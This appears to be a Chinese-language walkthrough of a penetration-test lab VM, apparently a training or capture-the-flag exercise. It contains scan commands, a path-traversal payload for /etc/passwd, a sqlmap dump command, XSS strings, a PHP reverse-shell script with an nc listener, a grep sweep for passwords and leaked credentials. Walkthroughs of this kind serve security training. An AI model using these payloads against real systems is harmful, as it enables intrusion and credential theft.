目录扫描1.nmap -sS -sV -O -p- 192.168.126.1322.dirsearch -u http:// -x 400-500敏感信息泄露1.通过扫描有info.php该 phpinfo 页面已经严重泄露了服务器内部信息属于高风险敏感信息泄露。2.http://192.168.126.132点击blog看见nanoCMS搜索发现敏感文件/data/pagesdata.txtadmin/shannon任意文件读取加了个‘include 会将指定的文件载入并执行里面的程序重复引用加载多次。include_once 函数会将指定的文件载入并执行里面的程序此行为和 include 语句类似唯一区别是如果该文件中已经被包含过则不会再次包含。所以此页面存在任意文件读取。在“”后面添加“../”可以多但是不要少。之后访问“/etc/passwd”要用“%00”进行截断。http://192.168.126.132/?page../../../../../ ../../../../etc/passwd%00sql脱裤sqlmap -u http://192.168.126.132/list/ --datanameaaaemailbbbphonecccorgddd -D mysql -T user --dumpxss1.需要单引号闭合在不同的位置。第二个语句如果需要弹出字符需要加单引号包裹。scriptalert(fff)/scriptscriptalert(2)/script2.scriptalert(1)/script3.4.5.scriptalert(1)/script6./textareascriptalert(qaz)/scriptRCE文件保存位置如下pages/111111.php下来使用蚁剑进行连接点击右键添加数据。虚拟终端上查看当前的用户提权敏感信息提权连接蚁剑后进行敏感信息搜索grep -R -i password /home/* 2 /dev/null常用于系统管理员快速查找可能包含密码信息的配置文件、脚本或日志1. grep• 基本功能文本搜索工具默认在文件中查找匹配指定模式的行并将这些行打印出来。2. -R• 含义递归搜索。• 作用让 grep 不仅搜索指定的文件还会进入目录的子目录搜索其中的所有文件。如果没有 -R/home/* 展开后如果是目录grep 会报错并跳过。3. -i• 含义忽略大小写ignore case。• 作用使搜索不区分大小写即 password、Password、PASSWORD 等都会被匹配。4. password• 含义要搜索的模式字符串。• 作用grep 会在每个文件中查找包含该字符串的行。5. /home/*• 含义搜索路径。• 作用Shell 会将 /home/* 展开为 /home 目录下的所有非隐藏文件和目录的列表例如 /home/user1、/home/user2 等。grep 会针对这些路径进行搜索如果是目录且使用了 -R则会递归进入。• 注意如果 /home 下没有匹配项例如空目录通配符可能保持原样导致 grep 报错但错误会被重定向丢弃。6. 2 /dev/null• 含义标准错误重定向。• 2表示将文件描述符 2标准错误stderr的输出重定向到指定位置。• /dev/null是一个特殊的设备文件写入它的任何数据都会被丢弃常被称为“黑洞”。• 作用将命令执行过程中的错误信息如“权限不足无法读取文件”、“没有此类文件或目录”等全部丢弃不在终端显示。这样终端上只会显示搜索结果不会显示大量权限拒绝的干扰信息。找到rootpassword去看哪个网址cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note发现密码50$cent反弹shell反弹 ShellReverse Shell是网络安全和渗透测试中常用的一种技术指目标机器主动连接攻击者机器从而让攻击者获得一个命令行交互界面。这与传统的“正向连接”攻击者主动连接目标相反。为什么需要反弹 Shell防火墙/NAT 限制目标机器可能位于内网或开启了防火墙阻止外部主动连接入站连接被拦截但通常允许出站连接如访问 Web、DNS。动态 IP 或隧道攻击者 IP 不固定或者需要绕过网络限制让目标主动回连更灵活。权限维持反弹 Shell 可作为后门在获得初始访问后建立持久化控制。假设我们攻击了一台机器打开了该机器的一个端口攻击者在自己的机器去连接目标机器目标ip目标机器端口这是比较常规的形式我们叫做正向连接。远程桌面web服务sshtelnet等等都是正向连接。那么什么情况下正向连接不太好用了呢1、对方主机在局域网内从外网无法直接访问2、对方主机上存在WAF对主动连接发来的请求数据检测严格而对向外发出的请求不进行检测或检测较少。3、对方的ip会动态改变你不能持续控制。4、对方由于防火墙等限制对方机器只能发送请求不能接收请求。5、对于病毒木马受害者什么时候能中招对方的网络环境是什么样的什么时候开关机都是未知所以建立一个服务端让恶意程序主动连接才是上策。那么反弹就很好理解了 攻击者指定服务端受害者主机主动连接攻击者的服务端程序就叫反弹连接。在渗透测试过程中得到webshell后一般我们会反弹shell原理A主机开启9090端口的tcp服务B主机连接到A主机的9090的tcp服务A主机通过tcp服务把命令发到B主机B主机读取命令并且在bash中执行B主机把执行结果发给A主机这样就可以在A主机中操控B主机了shell?php$ip 主机ip地址;$port 主机端口;$sock fsockopen($ip, $port);$descriptorspec array(0 $sock,1 $sock,2 $sock);$process proc_open(/bin/sh, $descriptorspec, $pipes);proc_close($process);?首先必须监听nc -lvnp 8888Python 升级为交互式 Shellpython -c import pty; pty.spawn(/bin/bash)# 1. python -c# python调⽤ Python 解释器# -c执⾏后⾯字符串中的 Python 代码# 2. import pty; pty.spawn(/bin/bash)# 这是要执⾏的 Python 代码分两部分# 3. import pty# 导入 Python 的 pty 模块伪终端⼯具# 4. pty.spawn(/bin/bash)# spawn() 函数创建⼀个新的进程# /bin/bash启动 bash shell拿下